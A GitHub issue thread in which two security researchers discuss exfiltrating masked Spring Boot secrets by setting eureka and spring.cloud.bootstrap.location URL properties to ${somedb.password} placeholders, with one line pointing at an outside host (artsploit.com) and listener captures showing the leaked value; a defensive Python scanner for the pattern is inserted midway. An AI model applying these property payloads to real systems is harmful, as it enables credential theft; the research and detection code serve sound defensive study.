Principle/source of "obtaining the plaintext of a password masked with asterisks (method 2)" #1

Closed
ghost opened this issue May 27, 2020 · 3 comments

Comments

@ghost

ghost commented May 27, 2020

"2020 attack-defense exercise ammunition depot: attention, you have a host online" (2020攻防演练弹药库-您有主机上线请注意)

Even if RCE is really not possible, there is a trick here to steal encrypted fields from the Spring configuration file; stealing the production environment's passwords/keys also works.

eureka.client.serviceUrl.defaultZone=http://${somedb.password}@127.0.0.1:5000
spring.cloud.bootstrap.location=http://${somedb.password}@artsploit.com/yaml-payload.yml

${somedb.password} is a Spring placeholder; it is actively filled in when a request like the following is made, which means anything that uses the following request format can exfiltrate it, not only eureka:

scheme://[user:password@]domain:port/path?query_string#fragment_id

[Spring source analysis] Reading .properties files and the ${...} placeholder replacement source code - 五月的仓颉 - 博客园

@LandGrey (Owner)

LandGrey commented May 27, 2020

A correction:

  • The source is not the content of the article you linked. Stealing the password with spring.cloud.bootstrap.location=http://${somedb.password}@artsploit.com/yaml-payload.yml cannot be reproduced at all; there is reason to suspect it simply does not work and that the author neither tested it nor traced the source code.

  • You can trace the flow of stealing the password via eureka.client.serviceUrl.defaultZone; it ties into eureka's authentication flow, which is why the password can be exfiltrated.

@ghost (Author)

ghost commented May 27, 2020

OK, thanks for the correction, master.

spring.cloud.bootstrap.location=http://${somedb.password}@artsploit.com/yaml-payload.yml

Here the password indeed cannot be carried out in the authentication header; Spring Boot ignores it here. But the following form works:

spring.cloud.bootstrap.location=http://127.0.0.1:8888/${somedb.password}.yml

Listening on [0.0.0.0] (family 0, port 8888)
Connection from localhost 1188 received!
HEAD /123456.yml HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_201
Host: 127.0.0.1:8888
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

This one:
eureka.client.serviceUrl.defaultZone=http://${somedb.password}@127.0.0.1:5000

This exploitation technique was also discovered by chance in March last year while digging into Eureka.

The overall idea is still to have Spring fill the asterisk-masked field into the placeholder in order to exfiltrate the data.

Choosing the authentication header was also accidental: at the time I saw that the url_path eureka accesses is /apps/, and assumed it could not be passed in the url_path. I also considered the case where HTTP requests cannot get out, and even passing it via dnslog.

I just tried it, and it can indeed be passed in the url_path as well:
eureka.client.serviceUrl.defaultZone=http://${somedb.password}@127.0.0.1:5000/123123

Listening on [0.0.0.0] (family 0, port 5000)
Connection from localhost 1319 received!
GET /123123/apps/ HTTP/1.1
Accept: application/json
DiscoveryIdentity-Name: DefaultClient
DiscoveryIdentity-Version: 1.4
DiscoveryIdentity-Id: 192.168.175.1
Accept-Encoding: gzip
Host: 127.0.0.1:5000
Connection: Keep-Alive
User-Agent: Java-EurekaClient/v1.6.2
Authorization: Basic MTIzNDU2Om51bGw=

spring.cloud.bootstrap.location is something I saw could be used for RCE while writing the article this year; since it was also an HTTP request, I extended it to this case without getting around to testing it. That was indeed not rigorous enough; I will correct this point in the article.
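The thread above establishes the defensive takeaway: Spring resolves ${...} placeholders in a property value before the HTTP client uses it, so any URL-valued property that an attacker can set (for example through a writable /env endpoint) becomes an exfiltration channel, either through the userinfo part that becomes a Basic auth header (the eureka case) or through the URL path (the bootstrap.location case). The following scanner is an added example written for this thread; it is not code from the issue, from LandGrey's project, or from Spring. It assumes a minimal .properties reader, a heuristic list of secret-looking property names, and a constructed sample file whose first two lines are the patterns discussed above. It flags placeholders that land in the userinfo, path, query or fragment of a URL, while letting routine ${HOST}-style placeholders in the host part pass.

```python
"""
Added example: config-side check for the Spring placeholder exfiltration pattern.

Not code from the issue or the project. Scans .properties text for URL-valued
properties whose ${...} placeholders would be resolved into the outbound request
(userinfo -> Authorization header, path/query/fragment -> request line).
"""
import re
from urllib.parse import urlsplit

# ${name} or ${name:default}; the first group is the referenced property name
PLACEHOLDER_RE = re.compile(r"\$\{([^}:]+)(?::[^}]*)?\}")
# Property names that usually hold secrets (heuristic; an assumption of this example)
SENSITIVE_NAME_RE = re.compile(
    r"password|passwd|pwd|secret|token|credential|api[_.-]?key|private[_.-]?key", re.I
)
URL_SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*://")


def parse_properties(text):
    """Minimal .properties reader: key=value lines, '#'/'!' comments, no continuations."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue
        key, sep, value = line.partition("=")
        if sep:
            props[key.strip()] = value.strip()
    return props


def url_components(url):
    """Split a URL into the parts a placeholder could be smuggled through."""
    parts = urlsplit(url)
    userinfo, _, hostport = parts.netloc.rpartition("@")
    return {
        "userinfo": userinfo,   # becomes the Basic auth header (the eureka case)
        "host": hostport,       # ${HOST}-style placeholders here are routine config
        "path": parts.path,     # the bootstrap.location case
        "query": parts.query,
        "fragment": parts.fragment,
    }


def scan_properties(props):
    """Return findings for URL-valued properties whose placeholders could leak data."""
    findings = []
    for key, value in props.items():
        if not URL_SCHEME_RE.match(value):
            continue
        for component, text in url_components(value).items():
            for name in PLACEHOLDER_RE.findall(text):
                sensitive = bool(SENSITIVE_NAME_RE.search(name))
                if component == "host" and not sensitive:
                    continue  # e.g. ${EUREKA_HOST}: normal, not a leak
                severity = "high" if sensitive or component == "userinfo" else "medium"
                findings.append({
                    "property": key,
                    "component": component,
                    "placeholder": name,
                    "severity": severity,
                })
    return findings


def scan_text(text):
    """Convenience wrapper: .properties text in, list of findings out."""
    return scan_properties(parse_properties(text))


# Constructed sample: the first two values are the patterns from this issue,
# the remaining lines are routine configuration that must not produce a finding.
SAMPLE_PROPERTIES = """\
eureka.client.serviceUrl.defaultZone=http://${somedb.password}@127.0.0.1:5000/123123
spring.cloud.bootstrap.location=http://127.0.0.1:8888/${somedb.password}.yml
spring.cloud.config.uri=http://${CONFIG_HOST:localhost}:8888
spring.datasource.url=jdbc:mysql://db.internal:3306/app
somedb.password=${DB_PASSWORD}
server.port=8080
"""

if __name__ == "__main__":
    for f in scan_text(SAMPLE_PROPERTIES):
        print(f"[{f['severity']}] {f['property']}: ${{{f['placeholder']}}} in URL {f['component']}")
```

Run against the sample it reports two high-severity findings, one for the userinfo placeholder in the eureka URL and one for the path placeholder in the bootstrap location, and nothing for the host placeholder or the non-URL values. The same check can be run over a dumped /actuator/env response before a refresh is honoured, or as a CI gate on committed configuration.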

@LandGrey (Owner)

Learned something. Indeed, data can be carried out through a placeholder in the URL path during an outbound HTTP request issued by the target.

@ghost ghost closed this as completed May 27, 2020